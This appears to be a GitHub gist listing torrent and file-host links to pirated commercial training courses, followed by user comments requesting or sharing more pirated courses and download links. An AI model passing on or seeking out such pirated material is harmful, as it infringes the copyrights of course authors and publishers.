http://kickass.to/mysql-database-tutorials-by-bucky-thenewboston-org-1-33-t8224550.html http://kickass.to/packtpub-advanced-penetration-testing-for-highly-secured-environments-t8300620.html http://kickass.to/pluralsight-mysql-query-optimization-and-performance-tuning-with-pinal-dave-t8553369.html http://kickass.to/pluralsight-relational-database-design-t8551479.html http://kickass.to/ruby-tutorial-bucky-totally-for-beginner-t8699509.html http://kickass.to/trainsignal-vmware-vcloud-director-5-1-essentials-t7495660.html http://kickass.to/trainsignal-vmware-vsphere-optimize-and-scale-vcap5-dca-t7495659.html http://kickass.to/trainsignal-vmware-workstation-9-for-the-it-admin-t7495658.html http://kickass.to/tutsplus-advanced-command-line-techniques-t7632228.html http://kickass.to/tutsplus-advanced-javascript-fundamentals-t6739742.html http://kickass.to/tutsplus-agile-design-patterns-2012-t6992118.html http://kickass.to/tutsplus-cleaner-code-with-coffeescript-t6741625.html http://kickass.to/tutsplus-detecting-code-smells-t8128341.html http://kickass.to/tutsplus-firebug-white-to-black-belt-v413hav-t7154501.html http://kickass.to/tutsplus-foundational-flask-creating-your-own-static-blog-generator-t8356996.html http://kickass.to/tutsplus-freelance-bootcamp-t6832678.html http://kickass.to/tutsplus-premium-e-book-mega-pack-v413hav-t7178526.html http://kickass.to/tutsplus-pro-workflow-for-web-designers-t6854268.html http://kickass.to/tutsplus-riding-ruby-on-rails-t6728201.html http://kickass.to/tutsplus-sql-essentials-t6746851.html http://kickass.to/tutsplus-tools-of-the-modern-web-developer-t8107617.html http://kickass.to/tutsplus-video-fundamentals-t6752217.html http://kickass.to/ine-ccna-wireless-640-722-iuwne-t8301376.html http://kickass.to/learn-metasploit-t8174472.html http://kickass.to/lynda-ruby-on-rails-essential-training-t7630711.html http://kickass.to/lynda-up-and-running-with-python-2013-eng-t8167709.html http://kickass.to/build-flat-responsive-website-from-scratch-complete-course-t8604527.html http://kickass.to/canvas-essentials-t8550909.html http://kickass.to/cbt-nuggets-70-331-microsoft-sharepoint-server-2013-x264-mkv-encod3r-t8595423.html http://kickass.to/cbt-nuggets-98-365-windows-server-admin-fundamentals-encod3r-t8613009.html http://kickass.to/cbt-nuggets-ccie-combo-pack-t271107.html http://kickass.to/cbt-nuggets-ccna-certification-videos-material-2010-gurufu-t4648321.html http://kickass.to/cbt-nuggets-juniper-networks-certified-specialist-security-jncis-sec-jn0-332-t8028083.html http://kickass.to/cehv7-cbt-nuggets-instructor-slides-tools-video-tools-study-guide-rar-t8705752.html http://kickass.to/cisco-ccna-initial-router-and-switch-configuration-t8648377.html http://kickass.to/cisco-ccna-security-aaa-and-ip-security-t8648378.html http://kickass.to/cisco-ccna-security-introduction-to-network-security-t8648381.html http://kickass.to/cisco-ccna-voice-configuration-and-advanced-features-t8648387.html http://kickass.to/cisco-ccna-voice-voice-overview-and-lab-setup-t8648386.html http://kickass.to/cisco-press-ccna-security-640-554-official-cert-guide-videos-t8648384.html http://kickass.to/coursera-neural-networks-and-machine-learning-geoffrey-hinton-university-of-toronto-t8568642.html http://kickass.to/eli-the-computer-guy-hacking-t8647661.html http://kickass.to/ine-ccie-data-center-storage-t8029396.html http://kickass.to/infinite-skills-learning-cloud-computing-with-amazon-web-services-2013-eng-t8703045.html http://kickass.to/infiniteskills-learning-tcp-ip-t8303739.html http://kickass.to/lynda-bootstrap-3-new-features-and-migration-t7958409.html http://kickass.to/lynda-bootstrap-adding-interactivity-to-your-site-t7519306.html http://kickass.to/lynda-com-jquery-ui-widgets-t8172743.html http://kickass.to/lynda-essential-training-t8157222.html http://kickass.to/lynda-foundation-incorporating-sass-and-compass-t7953037.html http://kickass.to/lynda-html5-projects-advanced-to-do-list-t7855578.html http://kickass.to/lynda-html5-projects-creating-a-responsive-presentation-2013-eng-t8167660.html http://kickass.to/lynda-online-presentations-with-reveal-js-2013-eng-t8167575.html http://kickass.to/lynda-teacher-tips-t8157202.html http://kickass.to/lynda-up-and-running-with-angularjs-t7982840.html http://kickass.to/lynda-up-and-running-with-bootstrap-3-t8011198.html http://kickass.to/lynda-up-and-running-with-cakephp-t7963854.html http://kickass.to/lynda-up-and-running-with-google-apps-script-t7917458.html http://kickass.to/lynda-up-and-running-with-php-codeigniter-t7849968.html http://kickass.to/lynda-web-semantics-t7899223.html http://kickass.to/lynda-wordpress-essential-training-2013-tutorial-t8270624.html http://kickass.to/pluralsight-aws-developer-fundamentals-2013-eng-t8703013.html http://kickass.to/pluralsight-bootstrap-3-t8214168.html http://kickass.to/pluralsight-cisco-ccie-routing-and-switching-implement-bgp-t8648391.html http://kickass.to/pluralsight-cisco-ccna-advanced-ethernet-and-file-management-t8051456.html http://kickass.to/pluralsight-cisco-ccna-security-firewalls-and-vpns-t8648393.html http://kickass.to/pluralsight-cisco-ccna-wan-technologies-learn-wide-area-network-wan-technologies-and-configuration-t7882351.html http://kickass.to/pluralsight-javascript-from-scratch-t7612372.html http://kickass.to/pluralsight-sublime-text-3-from-scratch-2013-eng-t8153034.html http://kickass.to/ten-ton-wordpress-mastery-video-t8452016.html http://kickass.to/trainsignal-microsoft-network-monitoring-t8028791.html http://kickass.to/tuts-plus-2013-bdd-in-rails-psiclone-t8474590.html http://kickass.to/tutsplus-advanced-css3-animations-t7791566.html http://kickass.to/tutsplus-an-introduction-to-node-js-t6744596.html http://kickass.to/tutsplus-better-statistics-with-google-charts-t7983386.html http://kickass.to/tutsplus-bootstrap-for-web-design-t8210956.html http://kickass.to/tutsplus-com-advanced-ui-techniques-2013-t7072722.html http://kickass.to/tutsplus-com-build-a-cms-in-codeigniter-2013-t7072644.html http://kickass.to/tutsplus-com-learning-mongodb-2013-t7072653.html http://kickass.to/tutsplus-computer-networks-distilled-v413hav-t7630795.html http://kickass.to/tutsplus-css-3d-essentials-t8027191.html http://kickass.to/tutsplus-css-noob-to-ninja-v413hav-t7475010.html http://kickass.to/tutsplus-css-tips-and-tricks-t8292119.html http://kickass.to/tutsplus-css3-essentials-t6608214.html http://kickass.to/tutsplus-css3-typography-techniques-t7882076.html http://kickass.to/tutsplus-design-patterns-in-ruby-t8354740.html http://kickass.to/tutsplus-fundamentals-of-design-t6645691.html http://kickass.to/tutsplus-fundamentals-of-print-design-t6667261.html http://kickass.to/tutsplus-fundamentals-of-ux-design-t6710443.html http://kickass.to/tutsplus-html-kickstart-essentials-t7969388.html http://kickass.to/tutsplus-html-tips-and-tricks-t8224648.html http://kickass.to/tutsplus-introduction-to-web-typography-t6662386.html http://kickass.to/tutsplus-javascript-fundamentals-101-t6738976.html http://kickass.to/tutsplus-jquery-ui-101-the-essentials-2013-eng-t8165125.html http://kickass.to/tutsplus-jquery-ui-101-the-essentials-t7791579.html http://kickass.to/tutsplus-jquery-ui-201-beyond-the-basics-t7791583.html http://kickass.to/tutsplus-jquery-ui-301-the-widget-factory-2013-eng-t8165109.html http://kickass.to/tutsplus-jquery-ui-301-the-widget-factory-working-files-2013-eng-t8180547.html http://kickass.to/tutsplus-laravel-essentials-t6722386.html http://kickass.to/tutsplus-logo-design-fundamentals-with-gary-simon-swatiate-t7867377.html http://kickass.to/tutsplus-mastering-corporate-design-v413hav-t7586047.html http://kickass.to/tutsplus-mastering-flat-design-v413hav-t7781777.html http://kickass.to/tutsplus-mastering-retro-web-design-v413hav-t7343186.html http://kickass.to/tutsplus-object-oriented-javascript-t6863065.html http://kickass.to/tutsplus-perfect-workflow-in-sublime-text-2-t6794850.html http://kickass.to/tutsplus-php-fundamentals-t6671312.html http://kickass.to/tutsplus-php-security-pitfalls-t7835091.html http://kickass.to/tutsplus-relational-databases-t8023530.html http://kickass.to/tutsplus-responsive-web-design-for-beginners-v413hav-t7385876.html http://kickass.to/tutsplus-responsive-web-design-techniques-t8103476.html http://kickass.to/tutsplus-responsive-web-design-with-foundation-t8103477.html http://kickass.to/tutsplus-simple-development-with-jquery-mobile-t6735499.html http://kickass.to/tutsplus-solid-design-patterns-t8208974.html http://kickass.to/tutsplus-test-driven-php-in-action-t6851704.html http://kickass.to/tutsplus-testing-tricks-for-php-and-laravel-developers-t7844807.html http://kickass.to/tutsplus-web-form-design-and-development-t8020800.html http://kickass.to/tutsplus-wordpress-plugin-development-essentials-t6615050.html http://kickass.to/udemy-build-an-instantly-updating-dynamic-website-with-jquery-ajax-t8415746.html http://kickass.to/udemy-psd-to-html5-css3-hand-code-a-beautiful-website-in-4-hours-t7740752.html http://kickass.to/video2brain-drupal-power-workshop-t6811365.html http://kickass.to/video2brain-exploring-css-positioning-t6683727.html http://kickass.to/video2brain-getting-started-with-joomla-t6600909.html http://kickass.to/video2brain-html5-for-beginners-learn-by-video-t6686185.html http://kickass.to/video2brain-html5-power-workshop-t6689166.html http://kickass.to/video2brain-php-5-3-advanced-web-application-programming-t6681560.html http://kickass.to/vtc-mysql-5-development-part-1-of-2-t7502575.html http://kickass.to/vtc-mysql-5-development-part-2-of-2-t7502576.html https://thepiratebay.se/torrent/6113010/Linux_CBT_Scripting_BASH__PERL__PYTHON__PHP https://thepiratebay.se/torrent/7667241/CBT.Nuggets.Python.Programming.Python.Language-PLATO https://thepiratebay.se/torrent/8608894/InfiniteSkills_-_Web_Programming_With_Python https://thepiratebay.se/torrent/7838122/Lynda.com_-_Python_3_Essential_Training https://thepiratebay.se/torrent/7837732/python_book_collection https://thepiratebay.se/torrent/9549614/Pluralsight.com_-_Python_Fundamentals https://thepiratebay.se/torrent/5134755/LiveLessons.Python.Fundamentals.DVDR-HELL https://thepiratebay.se/torrent/7112525/The_New_Boston_-_Python_Programming_Tutorials http://kickass.to/lynda-up-and-running-with-python-2013-eng-t8167709.html http://www.seedpeer.me/details/5730405/CBT-Nuggets---COMPTIA-SECURITY-SY0-201-WITH-SY0-301,-JK0-018-UPDATES.html http://www.seedpeer.me/details/6411686/CBT.Nuggets----IPv6.html http://www.seedpeer.me/details/6421814/CBT-Nuggets---Ubuntu.html http://www.seedpeer.me/details/6107414/LinuxCBT.Awk.Sed.Edition.html http://www.seedpeer.me/details/6107522/LinuxCBT-BASH-II-Edition-d3x.html http://www.seedpeer.me/details/4799869/LinuxCBT---Berkeley-Packet-Filters-BPF-Edition.html http://www.seedpeer.me/details/6881816/LinuxCBT--HTTPD-Edition.html http://www.seedpeer.me/details/6559038/LinuxCBT-Key-Files-edition.html http://www.seedpeer.me/details/6107600/LinuxCBT.MemCacheD.Edition-d3x.html http://www.seedpeer.me/details/5870507/LinuxCBT-Monitoring-Edition-feat-Nagios.html http://www.seedpeer.me/details/6107677/LinuxCBT-NIDS-Edition-d3x.html http://www.seedpeer.me/details/5925487/LinuxCBT-OpenLDAP-Edition.html http://www.seedpeer.me/details/6107558/LinuxCBT.OpenPGP.Edition-d3x.html http://www.seedpeer.me/details/6107692/LinuxCBT-OpenSSHv2-Edition-d3x.html http://www.seedpeer.me/details/6107699/LinuxCBT-PDNS-Edition-d3x.html http://www.seedpeer.me/details/2595080/LinuxCBT-Proxy-Edition-Feat-Squid-AG-torrent-[twistedtorrents2-com].html http://www.seedpeer.me/details/6110590/LinuxCBT-Samba-Edition-d3x.html http://www.seedpeer.me/details/6110595/LinuxCBT-SELinux-Edition-d3x.html http://www.seedpeer.me/details/4799871/LinuxCBT---SFTP-Edition.html http://www.seedpeer.me/details/6110602/LinuxCBT-SQLite-Edition-d3x.html http://www.seedpeer.me/details/5408265/LinuxCBT---Ubuntu-12.04-LTS.html http://www.seedpeer.me/details/4799857/LinuxCBT---UnixCBT-BSD8x-Edition-FreeBSD-8.2.html http://www.seedpeer.me/details/6110504/LinuxCBT.WinPerl.Edition-d3x.html http://www.seedpeer.me/details/6562861/Lynda-com---CMS-Fundamentals.html http://www.seedpeer.me/details/5247098/Lynda.com---Creating-an-Effective-Resume.html http://www.seedpeer.me/details/4989808/Lynda.com---CSS-with-LESS-and-SASS.html http://www.seedpeer.me/details/5340566/Lynda.com---Fundamentals-of-Software-Version-Control-Nov.-2012.html http://www.seedpeer.me/details/5569955/Lynda.com-GMail-For-Power-Users-V413HAV.html http://www.seedpeer.me/details/4631148/Lynda.com-Invaluable-Becoming-a-Leading-Authority.html http://www.seedpeer.me/details/4631108/Lynda.com-Invaluable-Building-Professional-Connections.html http://www.seedpeer.me/details/4623697/Lynda.com---Managing-a-Hosted-Website.html http://www.seedpeer.me/details/5236946/Lynda.com---PayPal-Essential-Training.html http://www.seedpeer.me/details/4596519/Lynda.com---PostgreSQL-9-With-PHP-Essential-Training-iRONiSO.html http://www.seedpeer.me/details/5016023/Lynda.com---Ruby-Essential-Training-with-Kevin-Skoglund.html http://www.seedpeer.me/details/4931186/Lynda.com---Using-Regular-Expressions.html http://www.seedpeer.me/details/6675342/Lynda---Git-Essential-Training.html http://www.seedpeer.me/details/6698556/Lynda---Leading-Change.html http://www.seedpeer.me/details/6973932/PluralSight-Refactoring-Fundamentals.html http://www.seedpeer.me/details/6661700/Tutsplus---Building-Ribbit-in-Rails.html http://www.seedpeer.me/details/6101172/Tutsplus---Cross-Platform-Browser-Testing-V413HAV.html http://www.seedpeer.me/details/5266314/TutsPlus---Git-Essentials.html http://www.seedpeer.me/details/4848412/TutsPlus---How-to-Be-a-Terminal-Pro.html http://www.seedpeer.me/details/4848374/TutsPlus---How-To-Customize-Your-Terminal.html http://www.seedpeer.me/details/4848299/TutsPlus---Maintainable-CSS-With-Sass-and-Compass.html http://www.seedpeer.me/details/4856068/TutsPlus---Regular-Expressions---Up-and-Running.html http://www.seedpeer.me/details/4816386/TutsPlus---The-Fundamentals-of-Ruby.html http://www.seedpeer.me/details/4848281/TutsPlus---The-Ultimate-Guide-for-Learning-Mootools.html http://www.seedpeer.me/details/4935147/CBT-Nuggets---Intermediate-to-Advanced-Linux-Series.html http://www.seedpeer.me/details/6251428/CBT-Nuggets---IPv6gidbcn.html http://www.seedpeer.me/details/5124174/CBT-Nuggets---LINUX-SERIES.html http://www.seedpeer.me/details/2891954/LinuxCBT-Deb5x-Edition-DVD-YUM.html http://www.seedpeer.me/details/4799921/LinuxCBT---Enterprise-Linux-4-Edition.html http://www.seedpeer.me/details/6290791/LinuxCBT-Network-Intrusion-Detection-System.html http://www.seedpeer.me/details/6107569/LinuxCBT.PackCapAnal.Edition-d3x.html http://www.seedpeer.me/details/6107588/LinuxCBT.PAM.Edition-d3x.html http://www.seedpeer.me/details/6110616/LinuxCBT-Win-Awk-Sed-Edition-d3x.html http://www.seedpeer.me/details/6666824/Packtpub-BackTrack-5-Wireless-Penetration-Testing-[Video].html http://www.seedpeer.me/details/6668649/Packtpub-Getting-started-with-Apache-Solr-Search-Server-[Video].html http://www.seedpeer.me/details/6668652/Packtpub-Getting-Started-with-Citrix-XenApp-6.5-[Video].html http://www.seedpeer.me/details/6668669/Packtpub-Kali-Linux---Backtrack-Evolved-Assuring-Security-by-Penetration-Testing.html http://www.seedpeer.me/details/6415199/Pluralsight-com-Installing-and-Configuring-Apache-Web-Server-iNKiSO.html http://www.seedpeer.me/details/6271468/Pluralsight---MySQL-Indexing-for-Performance-2013.html http://www.seedpeer.me/details/6228283/Pluralsight---Web-Performance-Course.html http://www.seedpeer.me/details/6376899/TutsPlus---Documentation-in-Ruby.html http://www.seedpeer.me/details/5661723/CBT-Nuggets-â%EF%BF%BD%EF%BF%BD-Cisco-CCENT-CCNA-ICND1-100-101.html http://www.seedpeer.me/details/5825975/CBT-Nuggets-CCNA-200-101-mp4.html http://www.seedpeer.me/details/5513622/CBT-Nuggets---Cisco-CCNA-Security-640-554.html http://www.seedpeer.me/details/5890097/CBT-Nuggets---Citrix-XenApp-6.5.html http://www.seedpeer.me/details/6187994/CBT-Nuggets----CompTIA-A-220-801-&-220-802-Update-2012-iso.html http://www.seedpeer.me/details/6353101/CBT-Nuggets---CompTIA-Security.rar.html http://www.seedpeer.me/details/5243830/CBT-Nuggets---Oracle-Certified-Professional-1Z0-053-OCP.html http://www.seedpeer.me/details/4935122/CBT-Nuggets---Oracle-Database-11g-DBA-1-1Z0-052.html http://www.seedpeer.me/details/7222524/CBT.Nuggets----Oracle.Database.11G.DBA.1Z0-053-EnCod3r.html http://www.seedpeer.me/details/4935128/CBT-Nuggets---Oracle-Database-11g-SQL-Fundamentals-1-1Z0-051.html http://www.seedpeer.me/details/5863952/CBTNuggets-VMware-View-5.iso.html http://www.seedpeer.me/details/6199576/CBT-Nuggets---Web-Development.html http://www.seedpeer.me/details/4825729/LinuxCBT---CentOS6x-Edition.html http://www.seedpeer.me/details/1520287/linuxCBT---DBMS-mysql-5-Training.html http://www.seedpeer.me/details/4799864/LinuxCBT---Deb6x-Edition.html http://www.seedpeer.me/details/4799881/LinuxCBT---Debian-Edition.html http://www.seedpeer.me/details/1548037/LINUXCBT-FEAT-SUSE-10-ENTERPRISE-EDITION-JGTiSO[www.thepeerhub.com].html http://www.seedpeer.me/details/6107551/LinuxCBT-KornShell-Edition-d3x.html http://www.seedpeer.me/details/4261635/Linuxcbt-Redhat-6-Enterprise-Tutorials.html http://www.seedpeer.me/details/1662106/LinuxCBT---RHEL5.html http://www.seedpeer.me/details/6110601/LinuxCBT-SLES-10-Edition-d3x.html http://www.seedpeer.me/details/4799923/LinuxCBT---SLES-11-Edition-SUSE-11-Enterprise.html http://www.seedpeer.me/details/6964916/Lynda---ASP.NET-MVC-4-Essential-Training.html http://www.seedpeer.me/details/7253647/Lynda---Building-Facebook-Applications-with-PHP-and-MySQL.html http://www.seedpeer.me/details/5552857/Lynda.com---Applied-Responsive-Design-Mar,-2013.html http://www.seedpeer.me/details/4657790/Lynda.com-Building-Facebook-Applications-with-HTML-and-JavaScript.html http://www.seedpeer.me/details/4986911/Lynda.com---C&C-Essential-Training.html http://www.seedpeer.me/details/4504272/Lynda.com-Choosing-Using-Web-Fonts.html http://www.seedpeer.me/details/6554622/Lynda.com---Designing-Resume.html http://www.seedpeer.me/details/5332552/Lynda.com---Drupal-7-Advanced-Training---TestOrToast.html http://www.seedpeer.me/details/7051972/Lynda.com---Drupal-7--Creating-and-Editing-Custom-Themes---with-Chaz-Chumley[Isaac-9].html http://www.seedpeer.me/details/5565633/Lynda.com---JavaScript-and-JSON-Mar,-2013.html http://www.seedpeer.me/details/6664728/Lynda.com-JavaScript-for-Web-Designers[2013].html http://www.seedpeer.me/details/6664733/Lynda.com-Node.js-Essential-Training[2013].html http://www.seedpeer.me/details/4591597/Lynda.com---Practical-and-Effective-JavaScript.html http://www.seedpeer.me/details/5256920/Lynda.com-Responsive-Design-with-Joomla--Exercice-Files.html http://www.seedpeer.me/details/5374680/Lynda.com---Simplified-Drupal-Sites-with-Drush---TestOrToast.html http://www.seedpeer.me/details/4795822/Lynda.com---Unix-for-Mac-OS-X-Users.html http://www.seedpeer.me/details/6716808/[Lynda.com]-Up-and-Running-with-Amazon-Web-Services-[2013,-ENG].html http://www.seedpeer.me/details/4593746/Lynda.com-Web-Form-Design-Best-Practices.html http://www.seedpeer.me/details/4850397/Lynda---Create-Your-First-Online-Store-with-Drupal-Commerce.html http://www.seedpeer.me/details/4850389/Lynda---Drupal-7-:-Essential-Training.html http://www.seedpeer.me/details/4850540/Lynda---Drupal-7-New-Features.html http://www.seedpeer.me/details/4850393/Lynda---Drupal-7-:-Reporting-and-Visualizing-Data.html http://www.seedpeer.me/details/5996422/Lynda---Up-and-Running-with-Backbone.js.html http://www.seedpeer.me/details/6971211/Lynda---Up-and-Running-with-CakePHP.html http://www.seedpeer.me/details/6666828/Packtpub-Beginning-Yii-[Video].html http://www.seedpeer.me/details/6666832/Packtpub-Building-a-Website-with-Drupal-[Video].html http://www.seedpeer.me/details/6668107/Packtpub-Drupal-7-Module-Development-[Video].html http://www.seedpeer.me/details/6668679/Packtpub-Learning-Joomla-3-Extension-Development-[Video].html http://www.seedpeer.me/details/7101071/Pluralsight---AngularJS-Fundamentals-[OGNADROL].html http://www.seedpeer.me/details/7268422/[Pluralsight]-AWS-Developer-Fundamentals-[2013,-ENG].html http://www.seedpeer.me/details/6695354/Pluralsight---Beginning-HTML5-Game-Development-With-Quintus.html http://www.seedpeer.me/details/6370939/Pluralsight---Cisco-CCNA-WAN-Technologies---Learn-wide-area-network-WAN-technologies-and-configuration.html http://www.seedpeer.me/details/6383616/Pluralsight-Introduction-to-Spring-MVC2013.html http://www.seedpeer.me/details/6228297/Pluralsight---Introduction-to-the-Facebook-Graph-API.html http://www.seedpeer.me/details/6294391/Pluralsight---Optimizing-and-Managing-Distributed-Systems-on-AWS-2013.html http://www.seedpeer.me/details/6698563/[Pluralsight]-Sublime-Text-3-From-Scratch-[2013,-ENG].html http://www.seedpeer.me/details/5056370/Tutsplus---Advanced-Backbone-Patterns-and-Techniques-2012.html http://www.seedpeer.me/details/7233352/Tutsplus---Become-a-Professional-JavaScript-Developer-Basics.html http://www.seedpeer.me/details/4848277/TutsPlus---Build-Web-Apps-in-Node-and-Express.html http://www.seedpeer.me/details/5683153/Tutsplus---Catch-Up-with-Ruby-on-Rails-4.html http://www.seedpeer.me/details/4918947/TutsPlus---CodeIgniter-Essentials.html http://www.seedpeer.me/details/5069781/TutsPlus---Connected-to-the-Backbone.html http://www.seedpeer.me/details/5513056/Tutsplus---Designing-Professional-Resumes.html http://www.seedpeer.me/details/5706815/Tutsplus-Easier-JavaScript-Apps-with-AngularJS.html http://www.seedpeer.me/details/6462415/TutsPlus---Easier-JavaScript-with-TypeScript.html http://www.seedpeer.me/details/5868293/TutsPlus---Getting-Started-With-Windows-8-Development-Using-HTML,-CSS-&-JavaScript-V413HAV.html http://www.seedpeer.me/details/6150521/TutsPlus-HTML5-Video-Essentials-PRODEV.html http://www.seedpeer.me/details/4841911/TutsPlus---JavaScript-Testing-With-Jasmine.html http://www.seedpeer.me/details/6593486/TutsPlus---Less-is-More.html http://www.seedpeer.me/details/6571637/TutsPlus---Modern-Testing-in-PHP-with-Codeception.html http://www.seedpeer.me/details/6095651/Tutsplus---Parallax-Scrolling-for-Web-Design.html http://www.seedpeer.me/details/6574591/TutsPlus---Say-Yo-to-Yeoman.html http://www.seedpeer.me/details/4811335/Tutsplus---Test-Driven-Development-in-Ruby.html http://www.seedpeer.me/details/6268980/TutsPlus-Test-Driven-Development-With-CoffeeScript-and-Jasmine.html http://www.seedpeer.me/details/6185755/TutsPlus---The-MVC-Mindser-Jeffery-Way---ICARUS.html http://www.seedpeer.me/details/5024493/TutsPlus---Venture-Into-Vim.html http://www.seedpeer.me/details/6286416/Tutsplus---Vim-for-Advanced-Users.html http://www.seedpeer.me/details/6585031/Tutsplus---WordPress-Hackers-Guide-to-the-Galaxy.html http://www.seedpeer.me/details/4848477/TutsPlus---Writing-Modular-JavaScript.html @giansalex Owner Author giansalex commented on 26 Feb 2018 • SOLID http://www.allitebooks.com/beginning-solid-principles-and-design-patterns-for-asp-net-developers/ @giansalex Owner Author giansalex commented on 7 Mar 2018 Udemy: AWS Arquitecto de Soluciones Certificado Asociado https://mega.co.nz/#!ZzhGWSAL!wuthFca0SdJBjmaP5lFX0QF6PeMsrdclKFXlZL1Rsi4 Pass: gratismas.org @giansalex Owner Author giansalex commented on 7 Mar 2018 Go lang Complete https://www.freetutorials.us/wp-content/uploads/2017/11/FreeTutorials.Us-Udemy-go-the-complete-developers-guide.torrent @GCPBigData GCPBigData commented on 15 Jul 2018 go books https://drive.google.com/open?id=1d6OsFAn8kpHCXtw0bcoYuyHqrAdGZva0 @freisrael freisrael commented on 14 Aug 2018 giansalex thanks for sharing. I am looking for learning phython with Joe Marini. It would be great if you post it. @FirstBoy1 FirstBoy1 commented on 25 May 2019 Can anyone provide this book "Getting started with Spring Framework: covers Spring 5" by " J Sharma (Author), Ashish Sarin ". Thanks in advance @okreka okreka commented on 31 May 2019 Can anyone provide "Windows Presentation Foundation Masterclass" course from Udemy. Thanks in advance @singhaltanvi singhaltanvi commented on 8 Aug 2019 can anyone provide 'sedimentology and petroleum geology' course from Udemy. Thanks in advance. @kumarsreenivas051 kumarsreenivas051 commented on 9 Sep 2019 Can anyone provide "Programming languages A,B and C" course from Coursera. Thanks in advance. @BrunoMoreno BrunoMoreno commented on 11 Sep 2019 The link for the torrents in piratebay, now is .org to the correct url. @sany2k8 sany2k8 commented on 24 Sep 2019 Can anyone add this The Complete Hands-On Course to Master Apache Airflow @pharaoh1 pharaoh1 commented on 30 Sep 2019 can you pls add this course to your list https://www.udemy.com/course/advanced-python3/ @SushantDhote936 SushantDhote936 commented on 1 Oct 2019 Can you add Plural Sight CISSP @allayGerald allayGerald commented on 1 Oct 2019 open directive for lynda courses: https://drive.google.com/drive/folders/1zQan1cq1ZnqXmueRF5IqKoOtpFxl6Y4G @ezekielskottarathil ezekielskottarathil commented on 3 Oct 2019 can anyone provide 'sedimentology and petroleum geology' course from Udemy. Thanks in advance. "wrong place boy" @pulkitd2699 pulkitd2699 commented on 8 Oct 2019 Does anyone has a link for 'Cyber security: Python and web applications' course? Thanks @mohanrajrc mohanrajrc commented on 19 Oct 2019 • Can anyone provide torrent file for Mastering React By Mosh Hamedani. Thanks https://codewithmosh.com/p/mastering-react @evilprince2009 evilprince2009 commented on 27 Oct 2019 Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 @nunusandio nunusandio commented on 30 Oct 2019 Can anyone post torrent file for ASP.NET Authentication: The Big Picture https://app.pluralsight.com/library/courses/aspdotnet-authentication-big-picture/table-of-contents @EslamElmadny EslamElmadny commented on 9 Dec 2019 Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? @Genius-K-SL Genius-K-SL commented on 14 Dec 2019 hay brother! do you have html5 game development with javascript course ? @Genius-K-SL Genius-K-SL commented on 14 Dec 2019 This link is not working brother! http://www.seedpeer.me/details/4657790/Lynda.com-Building-Facebook-Applications-with-HTML-and-JavaScript.html @smithtuka smithtuka commented on 20 Dec 2019 Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? @AbdOoSaed AbdOoSaed commented on 22 Dec 2019 Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff @EslamElmadny EslamElmadny commented on 23 Dec 2019 • Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj @jedi2610 jedi2610 commented on 27 Dec 2019 Can anyone provide me with Code with Mosh's Ultimate Java Mastery Series link? plis @InnocentZaib InnocentZaib commented on 31 Dec 2019 Please provide the link of codewithmosh The ultimate data structures and algorithms Bundle the link is given below. Please give me the torrnet file or link to download https://codewithmosh.com/p/data-structures-algorithms @edward-teixeira edward-teixeira commented on 1 Jan 2020 Please provide the link of codewithmosh The ultimate data structures and algorithms Bundle the link is given below. Please give me the torrnet file or link to download https://codewithmosh.com/p/data-structures-algorithms Yea i'm looking for it too @kaneyxx kaneyxx commented on 1 Jan Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj could you please share the part-1 & part-3? @edward-teixeira edward-teixeira commented on 2 Jan Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj Can you share part 1 and 3? @ravisharmaa ravisharmaa commented on 7 Jan Please add this . https://www.letsbuildthatapp.com/course/AppStore-JSON-APIs @WaleedAlrashed WaleedAlrashed commented on 13 Jan This one kindly. https://www.udemy.com/course/flutter-build-a-complex-android-and-ios-apps-using-firestore/ @Sopheakmorm Sopheakmorm commented on 19 Jan Anyone have this course: https://www.udemy.com/course/mcsa-web-application-practice-test70-480-70-483-70-486 @EslamElmadny EslamElmadny commented on 19 Jan Anyone have this course: https://www.udemy.com/course/mcsa-web-application-practice-test70-480-70-483-70-486 +1 @EslamElmadny EslamElmadny commented on 20 Jan Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj Can you share part 1 and 3? https://vminhsang.name.vn/category/it-courses/codewithmosh/ this link includes almost all mosh courses @mohanrajrc mohanrajrc commented on 22 Jan Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj Can you share part 1 and 3? https://vminhsang.name.vn/category/it-courses/codewithmosh/ this link includes almost all mosh courses Yes. Java mastery and Data Structures 1, 2, 3 are available in this site. free download. @shihab122 shihab122 commented on 22 Jan Please give me the torrnet file or link to download The Ultimate Design Patterns @EslamElmadny EslamElmadny commented on 22 Jan • Please give me the torrnet file or link to download The Ultimate Design Patterns Waiting for it also :D @K-wachira K-wachira commented on 23 Jan Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 